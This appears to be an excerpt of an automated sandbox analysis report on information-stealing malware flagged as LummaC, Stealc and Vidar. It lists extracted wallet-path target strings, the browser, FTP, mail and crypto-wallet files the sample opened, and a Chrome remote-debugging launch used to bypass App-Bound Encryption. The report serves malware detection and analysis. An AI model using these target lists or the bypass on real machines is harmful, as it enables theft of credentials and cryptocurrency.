Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: info.seco
Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: passphrase.json
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: file__0.localstorage
Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: MultiDoge
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: seed.seco
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: toolkit.osKeyStore.loglevel
Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: 8ed1a1ded0.exe	Binary or memory string: WIN_81
Source: 8ed1a1ded0.exe	Binary or memory string: WIN_XP
Source: 8ed1a1ded0.exe, 00000020.00000002.2836034761.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 8ed1a1ded0.exe	Binary or memory string: WIN_XPe
Source: 8ed1a1ded0.exe	Binary or memory string: WIN_VISTA
Source: 8ed1a1ded0.exe	Binary or memory string: WIN_7
Source: 8ed1a1ded0.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acdee533dd.exe PID: 6828, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match	File source: Process Memory Space: 8ed1a1ded0.exe PID: 7072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ed1a1ded0.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ed1a1ded0.exe PID: 6464, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000001A.00000002.3062381996.0000000000801000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000003.2782806732.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2570885838.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.3139421502.0000000000801000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.3142680354.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acdee533dd.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: acdee533dd.exe PID: 6828, type: MEMORYSTR

